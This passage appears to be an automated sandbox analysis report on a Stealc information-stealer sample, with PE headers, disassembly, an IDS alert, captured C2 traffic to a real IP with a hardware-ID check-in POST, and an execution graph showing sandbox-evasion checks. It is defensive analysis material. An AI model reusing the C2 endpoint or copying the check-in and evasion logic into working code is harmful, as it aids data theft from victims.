                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007F5E9481172Ah
                              movsx ebx, byte ptr [ebx]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add cl, ch
                              add byte ptr [eax], ah
                              add byte ptr [eax], al
                              add byte ptr [esi], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], dl
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ebx], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [esi], al
                              or al, byte ptr [eax]
                              add byte ptr [ebx], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], cl
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              pop es
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x25b0000x228007825c519f27d13cc7059e9db1cbdbd8eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x25e0000x2960000x200c326fff1ac31310b590fea84f0f546fcunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              igioonnz0x4f40000x1980000x197e00521231db8d407702c766f2c5f931c7a6False0.9951144939472878data7.9541328107459774IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              dimpkies0x68c0000x10000x4004f5067476cd62a80af34cb3fbe7354eaFalse0.8583984375data6.512164561394596IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x68d0000x30000x22000a50a632c047f5e4691cb8f1481eb504False0.06721047794117647DOS executable (COM)0.7347270425044776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-10-25T00:19:17.598711+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Oct 25, 2024 00:19:16.331762075 CEST4973080192.168.2.4185.215.113.37
                              Oct 25, 2024 00:19:16.339684963 CEST8049730185.215.113.37192.168.2.4
                              Oct 25, 2024 00:19:16.339824915 CEST4973080192.168.2.4185.215.113.37
                              Oct 25, 2024 00:19:16.339945078 CEST4973080192.168.2.4185.215.113.37
                              Oct 25, 2024 00:19:16.347491980 CEST8049730185.215.113.37192.168.2.4
                              Oct 25, 2024 00:19:17.298089981 CEST8049730185.215.113.37192.168.2.4
                              Oct 25, 2024 00:19:17.298217058 CEST4973080192.168.2.4185.215.113.37
                              Oct 25, 2024 00:19:17.300923109 CEST4973080192.168.2.4185.215.113.37
                              Oct 25, 2024 00:19:17.309983969 CEST8049730185.215.113.37192.168.2.4
                              Oct 25, 2024 00:19:17.598597050 CEST8049730185.215.113.37192.168.2.4
                              Oct 25, 2024 00:19:17.598711014 CEST4973080192.168.2.4185.215.113.37
                              Oct 25, 2024 00:19:19.889525890 CEST4973080192.168.2.4185.215.113.37

                              HTTP Request Dependency Graph

                              • 185.215.113.37

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449730185.215.113.37807628C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Oct 25, 2024 00:19:16.339945078 CEST89OUTGET / HTTP/1.1
                              Host: 185.215.113.37
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Oct 25, 2024 00:19:17.298089981 CEST203INHTTP/1.1 200 OK
                              Date: Thu, 24 Oct 2024 22:19:17 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Oct 25, 2024 00:19:17.300923109 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDA
                              Host: 185.215.113.37
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 45 46 35 31 31 32 37 43 37 35 33 37 39 39 36 32 31 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 2d 2d 0d 0a
                              Data Ascii: ------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="hwid"5FEF51127C753799621165------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="build"doma------EBKEHJJDAAAAKECBGHDA--
                              Oct 25, 2024 00:19:17.598597050 CEST210INHTTP/1.1 200 OK
                              Date: Thu, 24 Oct 2024 22:19:17 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              System Behavior

                              General

                              Target ID:0
                              Start time:18:19:12
                              Start date:24/10/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0xd80000
                              File size:1'826'816 bytes
                              MD5 hash:4AF633CEED4AACAF057EA12772B50AD2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1754683786.00000000056C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:7.5%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:10.1%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:24
                                execution_graph 13549 d969f0 13594 d82260 13549->13594 13573 d96a64 13574 d9a9b0 4 API calls 13573->13574 13575 d96a6b 13574->13575 13576 d9a9b0 4 API calls 13575->13576 13577 d96a72 13576->13577 13578 d9a9b0 4 API calls 13577->13578 13579 d96a79 13578->13579 13580 d9a9b0 4 API calls 13579->13580 13581 d96a80 13580->13581 13746 d9a8a0 13581->13746 13583 d96a89 13584 d96b0c 13583->13584 13586 d96ac2 OpenEventA 13583->13586 13750 d96920 GetSystemTime 13584->13750 13589 d96ad9 13586->13589 13590 d96af5 CloseHandle Sleep 13586->13590 13593 d96ae1 CreateEventA 13589->13593 13592 d96b0a 13590->13592 13592->13583 13593->13584 13947 d845c0 13594->13947 13596 d82274 13597 d845c0 2 API calls 13596->13597 13598 d8228d 13597->13598 13599 d845c0 2 API calls 13598->13599 13600 d822a6 13599->13600 13601 d845c0 2 API calls 13600->13601 13602 d822bf 13601->13602 13603 d845c0 2 API calls 13602->13603 13604 d822d8 13603->13604 13605 d845c0 2 API calls 13604->13605 13606 d822f1 13605->13606 13607 d845c0 2 API calls 13606->13607 13608 d8230a 13607->13608 13609 d845c0 2 API calls 13608->13609 13610 d82323 13609->13610 13611 d845c0 2 API calls 13610->13611 13612 d8233c 13611->13612 13613 d845c0 2 API calls 13612->13613 13614 d82355 13613->13614 13615 d845c0 2 API calls 13614->13615 13616 d8236e 13615->13616 13617 d845c0 2 API calls 13616->13617 13618 d82387 13617->13618 13619 d845c0 2 API calls 13618->13619 13620 d823a0 13619->13620 13621 d845c0 2 API calls 13620->13621 13622 d823b9 13621->13622 13623 d845c0 2 API calls 13622->13623 13624 d823d2 13623->13624 13625 d845c0 2 API calls 13624->13625 13626 d823eb 13625->13626 13627 d845c0 2 API calls 13626->13627 13628 d82404 13627->13628 13629 d845c0 2 API calls 13628->13629 13630 d8241d 13629->13630 13631 d845c0 2 API calls 13630->13631 13632 d82436 13631->13632 13633 d845c0 2 API calls 13632->13633 13634 d8244f 13633->13634 13635 d845c0 2 API calls 13634->13635 13636 d82468 13635->13636 13637 d845c0 2 API calls 13636->13637 13638 d82481 13637->13638 13639 d845c0 2 API calls 13638->13639 13640 d8249a 13639->13640 13641 d845c0 2 API calls 13640->13641 13642 d824b3 13641->13642 13643 d845c0 2 API calls 13642->13643 13644 d824cc 13643->13644 13645 d845c0 2 API calls 13644->13645 13646 d824e5 13645->13646 13647 d845c0 2 API calls 13646->13647 13648 d824fe 13647->13648 13649 d845c0 2 API calls 13648->13649 13650 d82517 13649->13650 13651 d845c0 2 API calls 13650->13651 13652 d82530 13651->13652 13653 d845c0 2 API calls 13652->13653 13654 d82549 13653->13654 13655 d845c0 2 API calls 13654->13655 13656 d82562 13655->13656 13657 d845c0 2 API calls 13656->13657 13658 d8257b 13657->13658 13659 d845c0 2 API calls 13658->13659 13660 d82594 13659->13660 13661 d845c0 2 API calls 13660->13661 13662 d825ad 13661->13662 13663 d845c0 2 API calls 13662->13663 13664 d825c6 13663->13664 13665 d845c0 2 API calls 13664->13665 13666 d825df 13665->13666 13667 d845c0 2 API calls 13666->13667 13668 d825f8 13667->13668 13669 d845c0 2 API calls 13668->13669 13670 d82611 13669->13670 13671 d845c0 2 API calls 13670->13671 13672 d8262a 13671->13672 13673 d845c0 2 API calls 13672->13673 13674 d82643 13673->13674 13675 d845c0 2 API calls 13674->13675 13676 d8265c 13675->13676 13677 d845c0 2 API calls 13676->13677 13678 d82675 13677->13678 13679 d845c0 2 API calls 13678->13679 13680 d8268e 13679->13680 13681 d99860 13680->13681 13952 d99750 GetPEB 13681->13952 13683 d99868 13684 d99a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13683->13684 13687 d9987a 13683->13687 13685 d99b0d 13684->13685 13686 d99af4 GetProcAddress 13684->13686 13688 d99b46 13685->13688 13689 d99b16 GetProcAddress GetProcAddress 13685->13689 13686->13685 13690 d9988c 21 API calls 13687->13690 13691 d99b68 13688->13691 13692 d99b4f GetProcAddress 13688->13692 13689->13688 13690->13684 13693 d99b89 13691->13693 13694 d99b71 GetProcAddress 13691->13694 13692->13691 13695 d96a00 13693->13695 13696 d99b92 GetProcAddress GetProcAddress 13693->13696 13694->13693 13697 d9a740 13695->13697 13696->13695 13698 d9a750 13697->13698 13699 d96a0d 13698->13699 13700 d9a77e lstrcpy 13698->13700 13701 d811d0 13699->13701 13700->13699 13702 d811e8 13701->13702 13703 d8120f ExitProcess 13702->13703 13704 d81217 13702->13704 13705 d81160 GetSystemInfo 13704->13705 13706 d8117c ExitProcess 13705->13706 13707 d81184 13705->13707 13708 d81110 GetCurrentProcess VirtualAllocExNuma 13707->13708 13709 d81149 13708->13709 13710 d81141 ExitProcess 13708->13710 13953 d810a0 VirtualAlloc 13709->13953 13713 d81220 13957 d989b0 13713->13957 13716 d8129a 13719 d96770 GetUserDefaultLangID 13716->13719 13717 d81249 __aulldiv 13717->13716 13718 d81292 ExitProcess 13717->13718 13720 d967d3 13719->13720 13721 d96792 13719->13721 13727 d81190 13720->13727 13721->13720 13722 d967cb ExitProcess 13721->13722 13723 d967ad ExitProcess 13721->13723 13724 d967c1 ExitProcess 13721->13724 13725 d967a3 ExitProcess 13721->13725 13726 d967b7 ExitProcess 13721->13726 13722->13720 13728 d978e0 3 API calls 13727->13728 13729 d8119e 13728->13729 13730 d811cc 13729->13730 13731 d97850 3 API calls 13729->13731 13734 d97850 GetProcessHeap RtlAllocateHeap GetUserNameA 13730->13734 13732 d811b7 13731->13732 13732->13730 13733 d811c4 ExitProcess 13732->13733 13735 d96a30 13734->13735 13736 d978e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13735->13736 13737 d96a43 13736->13737 13738 d9a9b0 13737->13738 13959 d9a710 13738->13959 13740 d9a9c1 lstrlen 13742 d9a9e0 13740->13742 13741 d9aa18 13960 d9a7a0 13741->13960 13742->13741 13744 d9a9fa lstrcpy lstrcat 13742->13744 13744->13741 13745 d9aa24 13745->13573 13748 d9a8bb 13746->13748 13747 d9a90b 13747->13583 13748->13747 13749 d9a8f9 lstrcpy 13748->13749 13749->13747 13964 d96820 13750->13964 13752 d9698e 13753 d96998 sscanf 13752->13753 13993 d9a800 13753->13993 13755 d969aa SystemTimeToFileTime SystemTimeToFileTime 13756 d969ce 13755->13756 13757 d969e0 13755->13757 13756->13757 13758 d969d8 ExitProcess 13756->13758 13759 d95b10 13757->13759 13760 d95b1d 13759->13760 13761 d9a740 lstrcpy 13760->13761 13762 d95b2e 13761->13762 13995 d9a820 lstrlen 13762->13995 13765 d9a820 2 API calls 13766 d95b64 13765->13766 13767 d9a820 2 API calls 13766->13767 13768 d95b74 13767->13768 13999 d96430 13768->13999 13771 d9a820 2 API calls 13772 d95b93 13771->13772 13773 d9a820 2 API calls 13772->13773 13774 d95ba0 13773->13774 13775 d9a820 2 API calls 13774->13775 13776 d95bad 13775->13776 13777 d9a820 2 API calls 13776->13777 13778 d95bf9 13777->13778 14008 d826a0 13778->14008 13786 d95cc3 13787 d96430 lstrcpy 13786->13787 13788 d95cd5 13787->13788 13789 d9a7a0 lstrcpy 13788->13789 13790 d95cf2 13789->13790 13791 d9a9b0 4 API calls 13790->13791 13792 d95d0a 13791->13792 13793 d9a8a0 lstrcpy 13792->13793 13794 d95d16 13793->13794 13795 d9a9b0 4 API calls 13794->13795 13796 d95d3a 13795->13796 13797 d9a8a0 lstrcpy 13796->13797 13798 d95d46 13797->13798 13799 d9a9b0 4 API calls 13798->13799 13800 d95d6a 13799->13800 13801 d9a8a0 lstrcpy 13800->13801 13802 d95d76 13801->13802 13803 d9a740 lstrcpy 13802->13803 13804 d95d9e 13803->13804 14734 d97500 GetWindowsDirectoryA 13804->14734 13807 d9a7a0 lstrcpy 13808 d95db8 13807->13808 14744 d84880 13808->14744 13810 d95dbe 14889 d917a0 13810->14889 13812 d95dc6 13813 d9a740 lstrcpy 13812->13813 13814 d95de9 13813->13814 13815 d81590 lstrcpy 13814->13815 13816 d95dfd 13815->13816 14905 d85960 13816->14905 13818 d95e03 15049 d91050 13818->15049 13820 d95e0e 13821 d9a740 lstrcpy 13820->13821 13822 d95e32 13821->13822 13823 d81590 lstrcpy 13822->13823 13824 d95e46 13823->13824 13825 d85960 34 API calls 13824->13825 13826 d95e4c 13825->13826 15053 d90d90 13826->15053 13828 d95e57 13829 d9a740 lstrcpy 13828->13829 13830 d95e79 13829->13830 13831 d81590 lstrcpy 13830->13831 13832 d95e8d 13831->13832 13833 d85960 34 API calls 13832->13833 13834 d95e93 13833->13834 15060 d90f40 13834->15060 13836 d95e9e 13837 d81590 lstrcpy 13836->13837 13838 d95eb5 13837->13838 15065 d91a10 13838->15065 13840 d95eba 13841 d9a740 lstrcpy 13840->13841 13842 d95ed6 13841->13842 15409 d84fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13842->15409 13844 d95edb 13845 d81590 lstrcpy 13844->13845 13846 d95f5b 13845->13846 15416 d90740 13846->15416 13848 d95f60 13849 d9a740 lstrcpy 13848->13849 13850 d95f86 13849->13850 13851 d81590 lstrcpy 13850->13851 13852 d95f9a 13851->13852 13853 d85960 34 API calls 13852->13853 13854 d95fa0 13853->13854 13948 d845d1 RtlAllocateHeap 13947->13948 13951 d84621 VirtualProtect 13948->13951 13951->13596 13952->13683 13955 d810c2 ctype 13953->13955 13954 d810fd 13954->13713 13955->13954 13956 d810e2 VirtualFree 13955->13956 13956->13954 13958 d81233 GlobalMemoryStatusEx 13957->13958 13958->13717 13959->13740 13961 d9a7c2 13960->13961 13962 d9a7ec 13961->13962 13963 d9a7da lstrcpy 13961->13963 13962->13745 13963->13962 13965 d9a740 lstrcpy 13964->13965 13966 d96833 13965->13966 13967 d9a9b0 4 API calls 13966->13967 13968 d96845 13967->13968 13969 d9a8a0 lstrcpy 13968->13969 13970 d9684e 13969->13970 13971 d9a9b0 4 API calls 13970->13971 13972 d96867 13971->13972 13973 d9a8a0 lstrcpy 13972->13973 13974 d96870 13973->13974 13975 d9a9b0 4 API calls 13974->13975 13976 d9688a 13975->13976 13977 d9a8a0 lstrcpy 13976->13977 13978 d96893 13977->13978 13979 d9a9b0 4 API calls 13978->13979 13980 d968ac 13979->13980 13981 d9a8a0 lstrcpy 13980->13981 13982 d968b5 13981->13982 13983 d9a9b0 4 API calls 13982->13983 13984 d968cf 13983->13984 13985 d9a8a0 lstrcpy 13984->13985 13986 d968d8 13985->13986 13987 d9a9b0 4 API calls 13986->13987 13988 d968f3 13987->13988 13989 d9a8a0 lstrcpy 13988->13989 13990 d968fc 13989->13990 13991 d9a7a0 lstrcpy 13990->13991 13992 d96910 13991->13992 13992->13752 13994 d9a812 13993->13994 13994->13755 13996 d9a83f 13995->13996 13997 d95b54 13996->13997 13998 d9a87b lstrcpy 13996->13998 13997->13765 13998->13997 14000 d9a8a0 lstrcpy 13999->14000 14001 d96443 14000->14001 14002 d9a8a0 lstrcpy 14001->14002 14003 d96455 14002->14003 14004 d9a8a0 lstrcpy 14003->14004 14005 d96467 14004->14005 14006 d9a8a0 lstrcpy 14005->14006 14007 d95b86 14006->14007 14007->13771 14009 d845c0 2 API calls 14008->14009 14010 d826b4 14009->14010 14011 d845c0 2 API calls 14010->14011 14012 d826d7 14011->14012 14013 d845c0 2 API calls 14012->14013 14014 d826f0 14013->14014 14015 d845c0 2 API calls 14014->14015 14016 d82709 14015->14016 14017 d845c0 2 API calls 14016->14017 14018 d82736 14017->14018 14019 d845c0 2 API calls 14018->14019 14020 d8274f 14019->14020 14021 d845c0 2 API calls 14020->14021 14022 d82768 14021->14022 14023 d845c0 2 API calls 14022->14023 14024 d82795 14023->14024 14025 d845c0 2 API calls 14024->14025 14026 d827ae 14025->14026 14027 d845c0 2 API calls 14026->14027 14028 d827c7 14027->14028 14029 d845c0 2 API calls 14028->14029 14030 d827e0 14029->14030 14031 d845c0 2 API calls 14030->14031 14032 d827f9 14031->14032 14033 d845c0 2 API calls 14032->14033 14034 d82812 14033->14034 14035 d845c0 2 API calls 14034->14035 14036 d8282b 14035->14036 14037 d845c0 2 API calls 14036->14037 14038 d82844 14037->14038 14039 d845c0 2 API calls 14038->14039 14040 d8285d 14039->14040 14041 d845c0 2 API calls 14040->14041 14042 d82876 14041->14042 14043 d845c0 2 API calls 14042->14043 14044 d8288f 14043->14044 14045 d845c0 2 API calls 14044->14045 14046 d828a8 14045->14046 14047 d845c0 2 API calls 14046->14047 14048 d828c1 14047->14048 14049 d845c0 2 API calls 14048->14049 14050 d828da 14049->14050 14051 d845c0 2 API calls 14050->14051 14052 d828f3 14051->14052 14053 d845c0 2 API calls 14052->14053 14054 d8290c 14053->14054 14055 d845c0 2 API calls 14054->14055 14056 d82925 14055->14056 14057 d845c0 2 API calls 14056->14057 14058 d8293e 14057->14058 14059 d845c0 2 API calls 14058->14059 14060 d82957 14059->14060 14061 d845c0 2 API calls 14060->14061 14062 d82970 14061->14062 14063 d845c0 2 API calls 14062->14063 14064 d82989 14063->14064 14065 d845c0 2 API calls 14064->14065 14066 d829a2 14065->14066 14067 d845c0 2 API calls 14066->14067 14068 d829bb 14067->14068 14069 d845c0 2 API calls 14068->14069 14070 d829d4 14069->14070 14071 d845c0 2 API calls 14070->14071 14072 d829ed 14071->14072 14073 d845c0 2 API calls 14072->14073 14074 d82a06 14073->14074 14075 d845c0 2 API calls 14074->14075 14076 d82a1f 14075->14076 14077 d845c0 2 API calls 14076->14077 14078 d82a38 14077->14078 14079 d845c0 2 API calls 14078->14079 14080 d82a51 14079->14080 14081 d845c0 2 API calls 14080->14081 14082 d82a6a 14081->14082 14083 d845c0 2 API calls 14082->14083 14084 d82a83 14083->14084 14085 d845c0 2 API calls 14084->14085 14086 d82a9c 14085->14086 14087 d845c0 2 API calls 14086->14087 14088 d82ab5 14087->14088 14089 d845c0 2 API calls 14088->14089 14090 d82ace 14089->14090 14091 d845c0 2 API calls 14090->14091 14092 d82ae7 14091->14092 14093 d845c0 2 API calls 14092->14093 14094 d82b00 14093->14094 14095 d845c0 2 API calls 14094->14095 14096 d82b19 14095->14096 14097 d845c0 2 API calls 14096->14097 14098 d82b32 14097->14098 14099 d845c0 2 API calls 14098->14099 14100 d82b4b 14099->14100 14101 d845c0 2 API calls 14100->14101 14102 d82b64 14101->14102 14103 d845c0 2 API calls 14102->14103 14104 d82b7d 14103->14104 14105 d845c0 2 API calls 14104->14105 14106 d82b96 14105->14106 14107 d845c0 2 API calls 14106->14107 14108 d82baf 14107->14108 14109 d845c0 2 API calls 14108->14109 14110 d82bc8 14109->14110 14111 d845c0 2 API calls 14110->14111 14112 d82be1 14111->14112 14113 d845c0 2 API calls 14112->14113 14114 d82bfa 14113->14114 14115 d845c0 2 API calls 14114->14115 14116 d82c13 14115->14116 14117 d845c0 2 API calls 14116->14117 14118 d82c2c 14117->14118 14119 d845c0 2 API calls 14118->14119 14120 d82c45 14119->14120 14121 d845c0 2 API calls 14120->14121 14122 d82c5e 14121->14122 14123 d845c0 2 API calls 14122->14123 14124 d82c77 14123->14124 14125 d845c0 2 API calls 14124->14125 14126 d82c90 14125->14126 14127 d845c0 2 API calls 14126->14127 14128 d82ca9 14127->14128 14129 d845c0 2 API calls 14128->14129 14130 d82cc2 14129->14130 14131 d845c0 2 API calls 14130->14131 14132 d82cdb 14131->14132 14133 d845c0 2 API calls 14132->14133 14134 d82cf4 14133->14134 14135 d845c0 2 API calls 14134->14135 14136 d82d0d 14135->14136 14137 d845c0 2 API calls 14136->14137 14138 d82d26 14137->14138 14139 d845c0 2 API calls 14138->14139 14140 d82d3f 14139->14140 14141 d845c0 2 API calls 14140->14141 14142 d82d58 14141->14142 14143 d845c0 2 API calls 14142->14143 14144 d82d71 14143->14144 14145 d845c0 2 API calls 14144->14145 14146 d82d8a 14145->14146 14147 d845c0 2 API calls 14146->14147 14148 d82da3 14147->14148 14149 d845c0 2 API calls 14148->14149 14150 d82dbc 14149->14150 14151 d845c0 2 API calls 14150->14151 14152 d82dd5 14151->14152 14153 d845c0 2 API calls 14152->14153 14154 d82dee 14153->14154 14155 d845c0 2 API calls 14154->14155 14156 d82e07 14155->14156 14157 d845c0 2 API calls 14156->14157 14158 d82e20 14157->14158 14159 d845c0 2 API calls 14158->14159 14160 d82e39 14159->14160 14161 d845c0 2 API calls 14160->14161 14162 d82e52 14161->14162 14163 d845c0 2 API calls 14162->14163 14164 d82e6b 14163->14164 14165 d845c0 2 API calls 14164->14165 14166 d82e84 14165->14166 14167 d845c0 2 API calls 14166->14167 14168 d82e9d 14167->14168 14169 d845c0 2 API calls 14168->14169 14170 d82eb6 14169->14170 14171 d845c0 2 API calls 14170->14171 14172 d82ecf 14171->14172 14173 d845c0 2 API calls 14172->14173 14174 d82ee8 14173->14174 14175 d845c0 2 API calls 14174->14175 14176 d82f01 14175->14176 14177 d845c0 2 API calls 14176->14177 14178 d82f1a 14177->14178 14179 d845c0 2 API calls 14178->14179 14180 d82f33 14179->14180 14181 d845c0 2 API calls 14180->14181 14182 d82f4c 14181->14182 14183 d845c0 2 API calls 14182->14183 14184 d82f65 14183->14184 14185 d845c0 2 API calls 14184->14185 14186 d82f7e 14185->14186 14187 d845c0 2 API calls 14186->14187 14188 d82f97 14187->14188 14189 d845c0 2 API calls 14188->14189 14190 d82fb0 14189->14190 14191 d845c0 2 API calls 14190->14191 14192 d82fc9 14191->14192 14193 d845c0 2 API calls 14192->14193 14194 d82fe2 14193->14194 14195 d845c0 2 API calls 14194->14195 14196 d82ffb 14195->14196 14197 d845c0 2 API calls 